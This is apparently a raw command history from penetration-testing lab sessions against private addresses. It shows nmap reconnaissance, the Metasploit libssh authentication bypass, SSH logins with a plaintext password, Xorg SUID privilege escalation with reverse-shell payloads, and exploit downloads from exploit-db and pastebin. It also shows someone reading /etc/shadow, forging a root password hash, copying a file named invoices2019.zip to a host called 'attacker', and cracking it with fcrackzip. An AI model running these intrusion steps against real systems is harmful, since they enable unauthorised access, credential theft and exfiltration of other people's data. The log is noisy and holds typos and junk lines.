nmap 172.18.1.5
nmap -A -p 22 172.18.1.5
service postgresql start
msfdb init
msfconsole
workspace
search openssh
ssh 172.18.1.5
nmap --script nmal-vulners,vulscan --script-args vulscandb=scriptvuldb.csv -sV -p22 172.18.1.5
nmap --script nman-vulners,vulscan --script-args vulscandb=scriptvuldb.csv -sV -p22 172.18.1.5
nmap --script nman-vulners,vulnscan --script-args vulscandb=scriptvuldb.csv -sV -p22 172.18.1.5
nmap --script nman-vulners --script-args vulscandb=scriptvuldb.csv -sV -p22 172.18.1.5
search libssh
use 0
show options
set rhosts 172.18.1.5
exploit
sessions
show options
show actions
set action Shell
show options
run
set action Execute
set spawn_pty true
set action Shell
run
sessions
service postgresql status
service postgresql restart
service postgresql status
service postgresql
service postgresql reload
service postgresql
service postgresql status
service postgresql stop
service postgresql start
exit
clear
ss -lntp | grep post
ss -lntp | grep post
ss -lntp | grep post
ss -lntp | grep post
systemctl daemon-reload
systemctl restart postgresql
service postgresql status
ss -lntp | grep post
ss -lntp | grep post
systemctl list-dependencies postgresql
msfconsole 
search libssh
use 0
show options
set rhosts 172.18.1.5
set spawn_pty true
run
show options
set check_banner false
run
ssh alice@172.18.1.15
ssh -p 23 alice@172.18.1.15
ssh alice@172.18.1.5
sessions
exit
exit -y
ssh alice@172.18.1.5
msfconsole 
search ssh
search scanner/ssh
use 10
show options
set RHOSTS 172.18.1.5
set USERNAME alice
set PASSWORD starwars
run
sessions -i 1
search shell_to_meter
use 0
show options
set SESSION 1
run
sessions -i 2
search xorg_x11
use 0
show options 
set SESSION 1
set LHOST 10.0.135.83
show options 
show targets 
set TARGET 1
run
set payload linux/x64/meterpreter/reverse_tcp 
show options 
run
sessions -i 2
search Xorg
show options 
show targets 
set target 2
run
set target 0
run
set payload cmd/unix/reverse_bash
show options 
run
set target 1
set payload linux/x64/meterpreter/reverse_tcp 
show options 
set lhost 172.16.1.88
run
set lhost 10.0.135.83
ssh alice@172.18.1.5
exit
exit
sessions -i 1
exit
exit -y
exit
ifconfig 
ping 172.18.1.5
ssh 172.18.1.5
nmap 172.18.1.5
nmap -A -vv 172.18.1.5
msfconsole 
use auxiliary/scanner/ssh/libssh_auth_bypass 
info
set RHOSTS 172.18.1.5
exploit 
sessions 
set CMD /bin/bash
exploit 
search 10933
run
options 
use SPAWN_PTY true
set SPAWN_PTY true
options 
use
exploit 
run
msfconsole 
use auxiliary/scanner/ssh/libssh_auth_bypass 
options
set RHOSTS 172.18.1.5
set SPAWN_PTY true
run
sessions 
sessions -1
set RPORT 23
run
sessions 1
ssh alice@172.18.1.5
nmap -A -vv 172.18.1.5CM
msfconsole 
search 18955
use exploit/linux/local/nested_namespace_idmap_limit_priv_esc 
options
use auxiliary/scanner/ssh/ssh_login
options
set rHOSTS 172.18.1.5 
options
set password starwars
set username alice
options
run
sessions -u 1
sessions
use exploit/linux/local/nested_namespace_idmap_limit_priv_esc 
options
set session 2
sessions
connect 2
sessions
sessions -i 2
use auxiliary/scanner/ssh/ssh_login
sessions -u 1
sessions -i 3
use exploit/linux/local/nested_namespace_idmap_limit_priv_esc 
options
set session 1
set LHOST 10.0.135.83
options
exploit
sessions 
sessions -u 1
set session 4
exploit
search 18955
search 16995
use exploit/linux/local/desktop_privilege_escalation 
options
sessions
set SESSION 1
exploit 
search ~
search 13272
searchsploit privilege
searchsploit privilege | grep linux
searchsploit privilege | grep linux
searchsploit privilege | grep linux | grep display
searchsploit privilege | grep linux | grep display
searchsploit privilege | grep linux | grep display
searchsploit privilege | grep display
searchsploit privilege | grep display
search display
search display linux
use linux
use exploit/linux/local/desktop_privilege_escalation 
options
run
sessions -u 1
set session 5
run
search 14665
use exploit/multi/local/xorg_x11_suid_server 
options
set session 1
set lhost 10.0.135.83
options
exploit 
nano file
cat file 
nmap 172.18.1.5 -A
mtr 8.8.8.8
ping 8.8.8.8
nmap 172.18.1.5 -A -vv
dig
telnet 127.18.1.5 23
ssh root@172.18.1.5 -p 23
ssh root@172.18.1.5 -p 23
ssh root@172.18.1.5 -p 22
telnet 127.18.1.5 23
nmap 172.18.1.5 -A -v -p1-65535
telnet 127.18.1.5 22
telnet 127.18.1.5 23
asdasf
asgasgaskjlaksjg
aashgasgjasigsag
msfconsole 
use auxiliary/scanner/ssh/ssh_version 
telnet 127.18.1.5 23
ssh                                                                                                                                                                
ssh root@172.18.1.5 -p 23
set rhosts 172.18.1.5
set rport 23
exploit
use auxiliary/scanner/ssh/libssh_auth_bypass 
show actions
set ACTION shell
run
set ACTION Shell
run
set RHOSTS 172.18.1.5
set RPORT 23
run
ssh alice@172.18.1.5
quit
exit -1
exit -y
msfconsole 
use exploit/multi/local/xorg_x11_suid_server 
show targets
set TARGET 1
show options
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 172.18.1.5
set username alice
set password starwars
exploit
use exploit/multi/local/xorg_x11_suid_server 
set TARGET 1
show options
set SESSION 1
exploit
set LHOST 0.0.0.0
exploit
set LHOST 10.0.135.83
exploit
show sessions
show options
show targets
set target 2
exploit
show options
set payload linux/x86/shell/reverse_tcp
exploit
curl www.exploit-db.com/exploits/45697
sudo nano /etc/hosts
top
nano /etc/resolv.conf 
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5 -p 23
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5
ssh target2@172.18.1.5 -p 23
.nmap -A 172.18.1.5
nmap -A 172.18.1.5
msfconsole 
search libssh
use auxiliary/scanner/ssh/libssh_auth_bypass
show options
set RHOSTS 172.18.1.5
set RPORT 23
run
nmap -A 172.18.1.5
use auxiliary/scanner/ssh/ssh_o
use auxiliary/scanner/ssh/ssh_login
set rhosts 172.18.1.5
set username alice
set password starwars
exploit
sessions -u 2
use exploit/multi/local/xorg_x11_suid_server 
show options
set session 3
run
ip a
set lhost 10.0.135.83
run
show targets
set target 1
run
set payload linux/x64/meterpreter/reverse_tcp 
show options
run
set target 1
sessions
set session 2
run
show options
set session 3
sessions
sessions ~
sessions 3
set session 3
exploit
set payload linux/x64/shell/bind_tcp 
exploit
show options
set payload linux/x64/shell/reverse_tcp 
exploit
set debug true
exploit
check
set verbose true
exploit
ssh alice@172.18.1.5 -X
check
show advanced
set ConsoleLock false
show options
set payload linux/x64/meterpreter/reverse_tcp 
exploit
set payload linux/x64/shell_reverse_tcp 
exploit
set Xdisplay 0
exploit
edit
reload
exploit
set payload linux/x64/meterpreter/reverse_tcp 
exploit
set XDISPLAY 
set XDISPLAY 1
exploit
set XDISPLAY 10:0
exploit
ping 8.8.8.8
sessions
sessions 3
show options
set session 2
set xdisplay 1
exploit
host exploit-db.com
host www.exploit-db.com
nano /etc/host
nano /etc/hosts
wget http://exploit-db.com/download/45922
nano /etc/hosts
wget http://exploit-db.com/download/45922
less 45922 
scp 45922 alice@172.18.1.5: 
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
s
ssh alice@172.18.1.5
nmap 172.18.1.5 -A
nc 172.18.1.5 23
wget https://gist.githubusercontent.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d/raw/d4425b8504d25cf364185257eff04c6a8cc9a06e/cve-2018-10993.py
msfconsole 
search libssh
use auxiliary/scanner/ssh/libssh_auth_bypass
show options 
set RHOSTS 172.18.1.5 
set CMD bash
run
?
sessions
?
run
set RPORT 23
run
exit
sessions
exit -y
ssh alice@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5 22
su kokot
cat /etc/shadow
cat /etc/passwd
ssh alice@172.18.1.5
ssh root@172.18.1.5
ssh alice@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5 -p 23
ssh alice@172.18.1.5 -p 23
ssh root@172.18.1.5 -p 23
ssh alice@172.18.1.5
ssh alice@172.18.1.5
msfconsole 
use auxiliary/scanner/ssh/libssh_auth_bypass
set rhosts 172.18.1.5
set rport 23
run
sessions -i
sessions -i 1
sessions -i
sessions -i 1
exit
exit -y
msfconsole 
use scanner/ssh/libssh_auth_bypass
set rhosts 172.18.1.5
set rport 23
show options
set CMD /bin/bash
run
sessions
ssh alice@172.18.1.5
cat /etc/shadow
md5
openssl md5
openssl 
openssl -h
nmap -p1-65535 -vv 172.18.1.5
msfconsole
nc 172.18.1.5
~
nc 172.18.1.5 23
nc 172.18.1.5 22
search libssh
use auxiliary/scanner/ssh/libssh_auth_bypass
show options
set RHOSTS 172.18.1.5
set RPORT 23
run
show options
show info 
ssh alice@172.18.1.5 
ssh alice@172.18.1.5 
ssh alice@172.18.1.5 -p 22
msfvenom
use ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOST 172.18.1.5
show options 
set USERNAME alice
set PASSWORD starwars
run
set RHOSTS 172.18.1.5
run
sessions 
sessions -i 2
use exploit/multi/local/xorg_x11_suid_server 
show options 
set LHOST 10.0.135.83
set SESSION 2
run
sessions 
set SESSION 1
run
use auxiliary/scanner/ssh/ssh_login
run
use exploit/multi/local/xorg_x11_suid_server 
show options 
sessions 
set SESSION 3
run
search 
search date:2018
search date:2018 type:post platform:linux
search date:2018 type:post
search date:2018 platform:linux
search date:2018 platform:linux | grep escalation
show options 
run
use exploit/linux/local/ueb_bpserverd_privesc
show options 
set SESSION 3
run
sessions 
sessions -i 1
search xorg
use exploit/multi/local/xorg_x11_suid_server 
show options 
set TARGET 0
show options 
ping 8.8.8.8
set payload linux/meterpreter/revese_tcp
set payload linux/meterpreter/reverse_tcp
set payload cmd/unix/reverse_bash
show options 
run
sessions 
ssh 172.18.1.5
ssh alice@172.18.1.5
wget http://pastebin.com/raw/hz0dX16z
wget http://pastebin.com/raw/hz0dX16z
wget http://pastebin.com/raw/hz0dX16z
while true; do wget http://pastebin.com/raw/hz0dX16z && break; done
while true; do wget http://pastebin.com/raw/hz0dX16z && break; done
run
while true; do wget http://pastebin.com/raw/hz0dX16z && break; done
while true; do wget http://pastebin.com/raw/hz0dX16z && break; done
wget http://104.20.209.21/raw/hz0dX16z
wget http://104.20.209.21/raw/hz0dX16z
wget http://pastebin.com/raw/hz0dX16z
cat hz0dX16z 
sessions 
sessions -i 3
use auxiliary/scanner/ssh/ssh_login
run
set PORT 23
run
use auxiliary/scanner/ssh/libssh_auth_bypass
show 
show options 
set CMD /bin/bash
run
sessions -i 4 
run
sessions 
use exploit/multi/local/xorg_x11_suid_server 
set SESSION 5
nc -lp 50
run
openssl passwd ahoj
openssl passwd -1 -salt xyz ahoj
ssh 172.18.1.5
ssh alice@172.18.1.5
find /usr/share/metasploit-framework/ -name xorg*
nano /usr/share/metasploit-framework/modules/exploits/multi/local/xorg_x11_suid_server.rb
ssh 172.18.1.5
nano /usr/share/metasploit-framework/modules/exploits/multi/local/xorg_x11_suid_server.rb
use ssh
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD ahoj
run
sessions
use exploit/multi/local/xorg_x11_suid_server 
set SESSION 6
run
reload
run
ssh 172.18.1.5
nmap -sV
nmap --help
nmap -sV 172.18.1.5
nmap --help
search libssh
set RHOST 172.18.1.5
set RPORT 23
use auxiliary/scanner/ssh/libssh_auth_bypass 
run
set RHOST 172.18.1.5
set RPORT 23
run
help
run
set RHOSTS 172.18.1.5
run
exit
exit -y
ssh 172.18.1.5
ssh alice@172.18.1.5
nmap -sP 192.168.0.0-100
ifconfig
nmap --help
nmap 172.18.1.5
nmap --script vuln 172.18.1.5
nmap -sV 172.18.1.5 -A -v
nmap -sV -p22 172.18.1.5
nmap -v -script vuln -p22 172.18.1.5
nmap -v -script vulscan 172.18.1.5
nmap --script vuln 172.18.1.5
nmap --help
nmap -sV 172.18.1.5
nmap -Pn --script vuln 172.18.1.5
msf5 --help
use auxiliary/scanner/ssh/libssh_auth_bypass
options
set RHOSTS 172.18.1.5 
options
run
show advanced
options
run
show advanced
options
set RPORT 23
run
ssh 
ssh 172.18.1.5 -l alice
use exploit/multi/local/xorg_x11_suid_server
options
set LHOST 172.18.1.5
show targets
set target 1
exploit
options
sessions
show sessions
metasploit
msfconsole
sessions
sessions -h
sessions -d
show sessions
sessions -l
set session 11295
options
exploit
ssh 172.18.1.5
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l alice
ping 
ping 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l bob
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l alice
ssh 172.18.1.5 -l alice
nmap -p 1-1000 172.18.1.5
libssh -h
nmap -p 1-56000 172.18.1.5
sshlib
sudo apt-get install libssh-dev
nmap -sV 172.18.1.5
nmap -h
nmap -sV 172.18.1.5
set RHOST 172.18.1.5
set RPORT 23
run
msfconsole
search libssh
set RHOST 172.18.1.5
set RPORT 23
use auxiliary/scanner/ssh/libssh_auth_bypass
run
set RHOSTS 172.18.1.5
run
.ssh alice@172.18.1.5:22
ssh alice@172.18.1.5:22
ssh alice@172.18.1.5
libssh
ssh
ssh -p
ssh --p
ssh -p -w
nmap -sV
msfconsole
service postgresql start
set RHOST 172.18.1.5
set RPORT 23
search libssh
msfconsole
search libssh
set RHOST 172.18.1.5
set RPORT 23
search libssh
use 
use auxiliary/scanner/ssh/libssh_auth_bypass
set rhosts 172.18.1.5
run
ssh alice starwars
ssh 172.18.1.5 
ssh 172.18.1.5
ssh alice@172.18.1.5
nmap 172.18.1.5
ping 172.18.1.5
db_nmap -v -sV 172.18.1.5
mfconsole
mfsconsole
msfconsole
use exploit/multi/nadler
sudo service postgresql start
sudo service metasploit start
set RHOST 172.18.1.5
set RPORT ~
set RPORT 23
run
db_status
set 172.18.1.5
set RHOST 172.18.1.5
set RPORT 23
show options
use
use auxiliary
use auxiliary/scanner/ssh/libssh_auth_bypass > options
run
options
set RHOST 172.18.1.5
run 
set RPORT 23
run
options
set RHOSTS 172.18.1.5
options
run
ssh 172.18.1.5
ssh root@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
nmap 10.0.135.83
nikto -h 10.0.135.83
man libssh
nmap -v 10.0.135.83
libssh
nmap -sV -p22 10.0.135.83
libssh-scanner
cd /
cd ~
ll
ls
find / libsshscan
find / -name \
nmap -sV -p22 10.0.135.83
msfconsole
search libssh
help
set RHOST 172.18.1.5
set RPORT 23
use 0
help
show options
set RHOSTS 172.18.1.5
show options
run
exit
exit -y
ssh 172.18.1.5
ssh alice@172.18.1.5
searchsploit linux 3.16 -exclude \
searchsploit linux 3.16 -exclude=\
searchsploit linux 3.16 --exclude=\
exit
exit
which ike-scanner
which ike-scan
ike-scan --help
ike-scan 172.18.1.5
ike-scan 172.18.1.5 -v
ike-scan 10.0.0.1
which libssh
which rpm
which yum
which apt
apt -h
apt search sshlib
which zenmap
zenmap -h
zenmap -t 10.0.0.1
zenmap -t 172.18.1.5
nikto -h
nikto -host+ 172.18.1.5
nikto -host 172.18.1.5
metasploit -h
nikto -host 172.18.1.5:22
zenmap -t 172.18.1.5:22
.nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
which metasploit
which msf
help
search CVE-2018-10933
use auxiliary/scanner/ssh/libssh_auth_bypass
info
set RHOSTS 172.18.1.5
set RPORT 23
help
exploit
ssh -v 172.18.1.5:23
ssh -v 172.18.1.5:22
ssh -h
ssh -R 172.18.1.5 -p 22 -v
ssh  alice@172.18.1.5 -p 22 -v
exit
.nmap -v 172.18.1.5
nmap -v 172.18.1.5
nmap -vv 172.18.1.5
nikto -h 172.18.1.5
nmap -vS 172.18.1.5
nmap -sV 172.18.1.5
msfconsole
search cve-2018-10933
use exploit auxiliary/scanner/ssh/libssh_auth_bypass
show options
use exploit auxiliary/scanner/ssh/libssh_auth_bypass 
show options
search cve-2018-10933
use auxiliary/scanner/ssh/libssh_auth_bypass
show options
set RHOSTS 172.18.1.5
run
set SPAWN_PTY yes
run
show options
set RPORT 23
run
clear
ssh 172.15.1.5
ssh 172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh root@172.18.1.5
libssh
ping 172.18.1.1
nmap 172.18.1.1
nmap -sV
nmap -sV 172.18.1.1
man libssh
sudo man libssh
apt-get install libssh-devel
nmap -sV 172.18.1.1
msfconsole
use auxiliary/scanner/ssh/ssh_version 
set rhosts 172.18.1.1
set rport 22
exploit
set rhosts 172.18.1.5
set rport 22
exploit
exit
nmap -sV 172.18.1.5
mfsconsole
msfconsole
use auxiliary/scanner/ssh/ssh_version 
set rhosts 172.18.1.5
set rport 23
exploit
set rport 22
exploit
show options 
exploit
set rport 23
exploit
run
search libssh
show options 
show payloads
set payload generic/shell_reverse_tcp
set lhost 10.0.135.83
show options 
exploit
exit
msfconsole
search dcom
use exploit/windows/dcerpc/ms03_026_dcom 
set rhost 172.18.1.5
set payload generic/shell_reverse_tcp 
set lhost 10.0.135.83
exploit
show options
set rport @#
set rport 23
exploit
show options
search libssh
use auxiliary/scanner/ssh/libssh_auth_bypass 
exploit
show options
set rhosts 172.18.1.5
set rport 23
run
nmap -v -sn 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
ipconf
nmap -p 1337-sV 172.18.1.5
nmap -p 1337 -sV 172.18.1.5
msf5
msfconsole 
nc 172.18.1.5 22 
nc 172.18.1.5 1337
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5 22
nc 172.18.1.5 22
set RHOST 172.18.1.5
set RPORT 23
use auxiliary(scanner/ssh/libssh_ath_bypass) > options
use auxiliary/scanner/ssh/libssh_auth_bypass > options
options 
set LHOST 172.18.1.5
options 
set RHOST 172.18.1.5
options 
set RHOSTS 172.18.1.5
options 
run
ssh alice@172.18.1.5
NEWPASSWD='root:$1$xyz$NpfAWIDYQurUeFv80XTXr1:17861:0:99999:7:::'
NEWPASSWD='root:$1$xyz$NpfAWIDYQurUeFv80XTXr1:17861:0:99999:7:::'
echo $XDISPLAY
ssh alice@172.18.1.5
ssh alice@172.18.1.5
nmap 172.18.1.1
nmap 10.0.0.1
nmap 172.18.1.5
nmap -p22/tcp 172.18.1.5
nmap -p22 172.18.1.5
nmap -sV 172.18.1.5
nmap -script ssh-hassh -p22 172.18.1.5
vi exploit.py
msfconsole 
cd
search libssh
set RHOST  172.18.1.5
set RPORT 23
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS  172.18.1.5
set RPORT 23
run
ssh 172.18.1.5 
ssh 172.18.1.5
ssh -p22 172.18.1.5
sudo service ssh restart
ssh -p22 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
ssh -help
ssh alice@172.18.1.5
search CVE-2018-14665
use exploit/multi/local/xorg_x11_suid_server 
set RHOSTS  172.18.1.5
set RPORT 22
run
search xorg
use exploit/multi/local/xorg_x11_suid_server 
set RHOSTS  172.18.1.5
set RPORT 22
run
search xorg
use exploit/multi/local/xorg_x11_suid_server 
set RHOSTS 172.18.1.5
set RPORT 23
run
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh-keygen
ssh-keygen
ssh-copy-id -i ~/.ssh/id_rsa.pub alice@172.18.1.5
ssh alice@172.18.1.5
ssh 172.18.1.5
ssh-keygen
y
ssh-keygen
ssh-copy-id -i ~/.ssh/id_rsa.pub alice@172.18.1.5
ssh alice@172.18.1.5
ping 172.18.1.5
nmap -p 1-30 172.18.1.5
nmap -p 22 -sV 172.18.1.5
nmap -p 22 -sV --version-all 172.18.1.5
golismero 
golismero --help
nmap -p 22 -sV --version-all 172.18.1.5
nmap 00help
nmap --help
nmap  172.18.1.5
nmap -p 22 -sV --version-all -sC -A 172.18.1.5
nmap -p 1-9999 172.18.1.5
nmap -sV 172.18.1.5
nmap -p 23 -sV --version-all -sC -A 172.18.1.5
nmap -p 23 -sV --version-all -sC -A 172.18.1.5
nmap -p 23 -sV --version-all 172.18.1.5
options
help
options
help
set RHOSTS 172.18.1.5
options
set RPORT 23
options
run
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
cat /etc/shadow
ssh alice@172.18.1.5
man nmap
nmap -sV 172.18.1.5
metasploit
man msfconsole
msfconsole
search
search libssh
use  auxiliary/scanner/ssh/libssh_auth_bypass
set RHOST 172.18.1.5
set RHOSTS 172.18.1.5
set RPORT 23
run
exit
quit
exit -y
ssh 172.18.5.1 
ssh 172.18.5.1:22
ssh 172.18.5.1
ssh 172.18.1.5
ssh 172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5..
ssh alice@172.18.1.5
ssh alice@172.18.1.5
msfconsole
help
set RHOSTS 172.18.1.5
set RPORT=23
set RPORT="23"
set 
set PORT=23
set RPORT=23
set RPORT 23
set RHOST 172.18.1.5
use  auxiliary/scanner/ssh/libssh_auth_bypass
set RHOST 172.18.1.5
set RHOSTS 172.18.1.5
set RPORT 23
run
cd ..
cd home
cd /etc
exit
exit -y
ip addr show
mfsconsole
msfconsole
use  auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS 172.18.1.5
set RPORT 23
run
sessions
sessions -i 2
sessions -i 
sessions -i 1
exit -y
ssh 172.18.1.5
ssh 172.18.1.5
nmap -A 172.18.1.5
mfsconsole
msfconsole
ssh alice@172.18.5.1
ssh alice@172.18.1.5
mfsconsole
msfconsole
use  auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS 172.18.1.5
set RPORT 23
run
sessions -i 1
help
irb
exit -y
msfconsole
use auxiliary/scanner/ssh/ssh_login
set KEY_FILE /tmp/id_rsa
set USERNAME root
set RHOSTS 172.18.1.5
set RPORT 23
run
sessions
man nmap
man nmap
ping 172.18.1.5
nmap -v -sn 172.18.1.5
nmap 172.18.1.5
ssh root@172.18.1.5
msfconsole 
use auxiliary/scanner/ssh/libssh_auth_bypass 
options
set RHOST 172.18.1.5
options
set RHOSTS 172.18.1.5
options
run
set SPAWN_PTY true
options
run
sessions -1
sessions -l
exploit
sessions -l
set LHOST 10.0.135.83
run
sessions -l
set LPORT 4444
run
options
set RPORT 23
run
sessions -1
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ping 172.18.1.5
nmap 172.18.1.5
nmap -p 22 172.18.1.5
ssh 172.18.1.5
nmap -sV
ssh 172.18.1.5
nmap -sV 172.18.1.5
host 172.18.15.1
host 172.18.5.1
host 172.18.1.5
nmap --script ssh-hassh -p 22 172.18.1.5
msf > loadpath
msf > search name:libssh_auth_bypass
msf > search name:libssh_auth_bypass
msf
ls
msf
msfconsole 
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS 217.18.1.5
set RPORT 23
run
set RHOSTS 172.18.1.5
set RPORT 23
run
exit
ssh 127.18.1.5
ssh alice@127.18.1.5
history
nmap -sV 172.18.1.5
mfsconsole
ssh alice@172.18.1.5
ls
exit
nmap -h
nmap -sS 100.100.100.4
nmap -sS -p- 100.100.100.4
ssh 100.100.100.4
back
exit
systemctl start postgresql
exit
back
service postgresql start
service metasploit start
golismero.py scan 100.100.100.4
golismero.py scan 100.100.100.4:22
golismero scan 100.100.100.4:22
golismero scan 100.100.100.4
lynis audit system remote 100.100.100.4
nikto -H
dmitry 100.100.100.4
ike-scan 100.100.100.4
ike-scan 100.100.100.4:22
netdiscover 100.100.100.4
netdiscover -i 100.100.100.4
netdiscover -r 100.100.100.4
golismero 100.100.100.4
nmap -sV
nmap -sV 100.100.100.4
nmap -sV 10.0.0.1
nmap -sV 172.18.1.1
nmap -sV 172.18.1.5
ssh 172.18.1.g:23
ssh 172.18.1.5:23
ssh 172.18.1.5 -p 23
searchsploit
searchsploit openssh 6.7p1 debian5
nmap -sV 172.18.1.5
searchsploit openssh 6.7p1
searchsploit
nmap -sV 172.18.1.5
nmap -sV -p- 172.18.1.5
nmap -sV -p- 172.18.1.5
options
help
analyze
exit
msfdb init
msfdb
msfdb start
msfdb run
db_status
exit
ss -lntp | grep post
ss -lntp | grep post
ss -lntp
service postgresql restart
msfdb reinit
ss -ant
msfdb reinit
msfdb
msfdb run
use scanner/ssh/libssh_auth_bypass
options
run
set
set RHOSTS
set RHOSTS 172.18.1.5
run
set
set SPAWN_PTY true
run
set CMD ls
run
set VERBOSE true
set RPORT 23
run
exit
exit -y
ssh 172.18.1.5
ssh alice@172.18.1.5
msfdb
msfdb run
use exploit/multi/local/xorg_x11_suid_server
options
show options
show advanced
run
exit
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh alice@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5
ssh root@172.18.1.5
ls
ls
nmap
nmap 10.1.26.9
nmap 127.0.0.1
nmap 0.0.0.0
ifconfig
nmap 10.0.2.0
nmap 10.0.2.0/24
nmap 10.1.26.0/24
ssh 10.1.26.100
ssh 10.1.26.9
ssh 10.1.26.0/16
nmap 10.1.26.0/16
exit
nmap
nmap -v 10.1.26.4
nmap -v 10.1.26.9
ssh --help
ssh 10.1.26.9
ssh 10.1.26.9 admin/123456
ssh --help
ssh 10.1.26.9
ssh -l admin 10.1.26.9
ssh admin@admin 10.1.26.9
ssh admin@10.1.26.9
ls
nfs --help
NFS --help
NFS
path
-path
--path
pwd
pdw
pwd
scp admin@10.1.26.9:/home/admin/invoices2019.zip /root
scp invoices2019.zip
scp -r admin@10.1.26.9:/home/admin/invoices2019.zip /root
scp -r admin@10.1.26.9:invoices2019.zip /local/directory
scp -r admin@10.1.26.9:/home/admin/invoices2019.zip /local/directory/
scp -r admin@10.1.26.9:/home/admin/invoices2019.zip /local/directory
scp admin@10.1.26.9:/home/admin/invoices2019.zip /local/directory
scp admin@10.1.26.9:invoices2019.zip /local/directory
scp admin@10.1.26.9:/home/admin/invoices2019.zip /local/directory
scp admin@10.1.26.9:/home/admin/invoices2019.zip /local/Documents
scp admin@10.1.26.9:/home/admin/invoices2019.zip /root/Documents
scp admin@10.1.26.9:/home/admin/invoices2019.zip /home/
scp admin@10.1.26.9:/home/admin/invoices2019.zip /home
ls
cd Documents
chmod +x
chmod +rwx
chmod +rwx Documents
ls
cd ..
chmod +rwx Documents
ls
pdw
pwd
scp admin@10.1.26.9:/home/admin/invoices2019.zip /root/Documents
chmod -rwx Documents
chmod -rwx Documents
scp admin@10.1.26.9:/home/admin/invoices2019.zip /root/Documents
scp admin@10.1.26.9:invoices2019.zip /root/Documents
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
exit
scp admin@10.1.26.9:invoices2019.zip /root/Documents
cat invoices2019.zip
fcrackzip -b invoices2019.zip
fcrackzip -l invoices2019.zip
fcrackzip -l 1 5 invoices2019.zip
fcrackzip -l 1 invoices2019.zip
fcrackzip -B invoices2019.zip
fcrackzip -D invoices2019.zip
fcrackzip --help
fcrackzip -V
fcrackzip -V invoices2019.zip
fcrackzip -u invoices2019.zip
fcrackzip -m invoices2019.zip
fcrackzip -m 1
fcrackzip -m zip1
fcrackzip -m invoices2019.zip
fcrackzip -p invoices2019.zip
fcrackzip -p invoices2019.zip
fcrackzip -p invoices2019.zip 1
fcrackzip -p 1 invoices2019.zip
fcrackzip -b -c 'a' -v -u invoices2019.zip
fcrackzip -b -v -u invoices2019.zip
fcrackzip -b -v -u /root.Documents.invoices2019.zip
fcrackzip -b -v -u /root.Documents/invoices2019.zip
fcrackzip -u /root.Documents/invoices2019.zip
sudo bash
fcrackzip -f -u -b /root/Documents/invoices2019.zip
fcrackzip --help
fcrackzip -v -u -b /root/Documents/invoices2019.zip
ld
ls
cd Documents
ls
fcrackzip --help
fcrackzip -p
fcrackzip -p invoices2019.zip /usr/share/wordlists/
fcrackzip -p invoices2019.zip /usr/share/wordlists/fasttrack.txt
fcrackzip -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
ls
cd Documents
ls
fcrackzip -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cd Document
cd Documents
fcrackzip -u -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cd Documents
fcrackzip -u -p -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -p -D invoices2019/zip /usr/share/wordlists/fasttrack.txt
fcrackzip -u -p -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -p -D invoices2019.zip /usr/share/wordlists/fasttrack.txt
fcrackzip -u -D -p invoices2019.zip /usr/share/wordlists/fasttrack.txt
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoice2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt /Documents/invoice2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoice2019.zip
ls
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
ssh admin@10.1.26.9
-l admin 10.1.26.9
ssh -l admin 10.1.26.9
passwd admin
--help
fcrackzip
fcrackzip --help
fcrackzip --h
fcrackzip -h
fcrackzip --help
nmap
nmap -sL
nmap -iR
nmap -iR 2
nmap 10.1.26.4
nmap 10.1.26.9
nmap 10.1.26.4
nmap 10.1.26.9
ssh admin@10.1.26.9
exit
ssh admin@10.1.26.9
ls
scp
scp invoices2019.zip root@attacker:
scp invoices2019.zip root@attacker:exit
exit
scp
ssh admin@10.1.26.9
scp root@attacker
scp root@attacker:~/
scp root@attacker:~/ invoices2019.zip
exit
scp admin@10.1.26.9:/invoices2019.zip Desktop/
scp admin@10.1.26.9:invoices2019.zip Desktop/
ls
cd Desktop/
ls
fcrackzip -h
fcrackzip --use-unzip invoices2019.zip
fcrackzip --b invoices2019.zip
